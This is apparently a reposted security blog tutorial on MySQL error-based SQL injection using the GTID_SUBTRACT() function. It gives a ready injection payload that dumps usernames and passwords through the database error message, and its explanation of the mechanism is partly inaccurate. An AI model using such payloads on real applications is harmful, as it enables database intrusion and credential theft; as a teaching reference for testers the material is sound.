[sql injection-error injection 2] GTID_SUBTRACT() function error injection

News 2023-07-16 13:06:47 views: null

Table of contents

GTID_SUBTRACT() error injection

1. Grammar introduction:

2. The reason for the error

network security coterie

(***Note: Pay attention to the version requirements)

GTID_SUBTRACT () error injection

1. Grammar introduction:

Version:

MySQL >=5.6

The GTID_SUBTRACT() function is a function in MySQL that calculates the difference between two global transaction identifiers (GTIDs). GTID is a global transaction identifier introduced in MySQL 5.6, which is used to track transactions in the database

grammar:

GTID_SUBTRACT(gtid_set, gtid)

Among them, gtid_set is a GTID set, and gtid is a single GTID. This function returns a new GTID set representing the remainder after subtracting gtid from gtid_set

principle:

  1. First, split the gtid_set into individual GTIDs.
  2. Then, iterate through each GTID, checking if it's the same as the gtid. If the same, it is removed from the gtid_set.
  3. Finally, reassemble the remaining GTIDs into a new GTID set and return

scenes to be used:

  1. Database replication: When a transaction is executed on the master database, a GTID is generated and passed to the slave database. The slave database can use the GTID_SUBTRACT() function to calculate the difference between the master and slave databases to determine which data needs to be replicated.
  2. Database Migration: When you need to migrate data from one database to another, you can use the GTID_SUBTRACT() function to calculate the difference between the two databases and copy only the data in the difference

2. The reason for the error

cause:

1. GTID (Global Transaction ID) is a unique identifier used to identify global transactions in MySQL

2. The GTID_SUBTRACT() function can be used to calculate the difference between two GTID sets to determine which transactions exist in one GTID set but do not exist in another GTID set

3. Inject malicious SQL code into gtid_set1 or gtid_set2 parameters. In this way, when the GTID_SUBTRACT() function is executed, the malicious code will be executed

payload:

select GTID_SUBTRACT(user(),1)

') or gtid_subtract(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from 表名),0x7e),1)--+

//GROUP_CONCAT()函数将它们组合成一个字符串
//concat()函数用于连接字符串
//0x7e表示波浪符(~)

Graphic:

root@localhost

 

network security coterie

README.md Book Bansheng/Network Security Knowledge System-Practical Center-Code Cloud-Open Source China (gitee.com)https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md icon-default.png?t=N658https://gitee. com/shubansheng/Treasure_knowledge/blob/master/README.md

GitHub - BLACKxZONE/Treasure_knowledgehttps://github.com/BLACKxZONE/Treasure_knowledge

Guess you like

Origin blog.csdn.net/qq_53079406/article/details/131635814
Recommended
Rushing to the GitHub hot list——How can open source programming languages and frameworks be so cute?
Beijing Humanoid Robot Innovation Center launches Tiangong, the world's first full-size humanoid robot with purely electric drive for anthropomorphic running
Ranking
8个无需编写代码即可使用 Python 内置库的方法
Java collections interview knowledge Lite
Machine learning algorithms foundation - Introduction a (watermelon materials for the book)
(Easy) Ransom Note - LeetCode
[Five days] Qt from entry to actual combat: the second day
Remember once extremely pit father can not download Maven Jar package of issues: IDEA question
The minimum cost Shortest
OSPF study map (the most complete version)
Network Takeaways
GnuPG
Daily
More
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

Code World

© 2018 codetd.com